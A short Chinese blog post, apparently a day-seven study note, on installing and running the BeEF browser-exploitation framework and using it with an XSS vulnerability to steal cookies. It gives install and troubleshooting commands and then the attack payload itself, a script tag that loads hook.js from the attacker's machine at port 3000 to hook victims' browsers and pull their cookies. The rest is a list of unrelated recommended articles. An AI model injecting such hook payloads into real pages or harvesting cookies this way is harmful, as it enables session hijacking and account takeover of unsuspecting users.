day07beef-xss之根据beef-xss获取cookies

guowu6662024-05-11 20:52

1.安装

bash 复制代码 
apt-get update
apt-get install beef-xss

若报错运行不了尝试

apt remove ruby

apt remove beef-xss

apt-get install ruby

apt-get install ruby-dev libpcap-dev

gem install eventmachine

apt-get install beef-xss

2.运行

bash 复制代码 
beef-xss

运行成功会自动弹出浏览框。

bash 复制代码 
攻击代码:beef-xsx所在电脑的ip:3000/hook.js

<script src="http://192.168.190.141:3000/hook.js"></script>

结合xss漏洞可以获取cookies ,在beef-xss查看结果。

发送指令获取cookies

相关推荐
用户21366100357242 分钟前
Vue2组件化开发与父子通信
前端·vue.js
Momo__1 小时前
TypeScript satisfies 操作符——比 as 更安全的类型守门员
前端·typescript
用户2136610035721 小时前
Vue2事件系统与指令进阶
前端·vue.js
labixiong1 小时前
实现一个能跑的迷你版Promise(一)
前端·javascript·面试
Csvn3 小时前
`??` 和 `||` 搞混,线上用户头像全挂了
前端
kyriewen4 小时前
白宫前脚下了限制令,OpenAI 后脚就把 GPT-5.6 发了
前端·gpt·openai
用户40269244819084 小时前
CRMEB Pro 新增后台接口全链路:路由、权限、验证器、返回格式一次讲清
前端·后端
泉城老铁5 小时前
springboot+vue+ ffmpeg 实现视频的拉流播放
前端
PedroQue995 小时前
uni-router v1.8.0新增冷启动守卫补执行
前端·uni-app
xiaok5 小时前
部署之后,本地浏览器还在读取旧缓存导致页面一直显示loading中
前端
热门推荐
012026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?022026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04【AI】2026 年具身智能模型和世界模型总结05飞书长连接_事件订阅(接收消息,审批任务状态变更)06Trae国际版与国内版深度测评:AI原生IDE的双生花07GitHub 镜像站点08Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析092026年AI架构实战:彻底解决OpenAI接口超时与封号,Python调用GPT-5.2/Sora2企业级架构详解(附源码+压测报告)10【AI总结】2026年6月 主流国内外大模型总结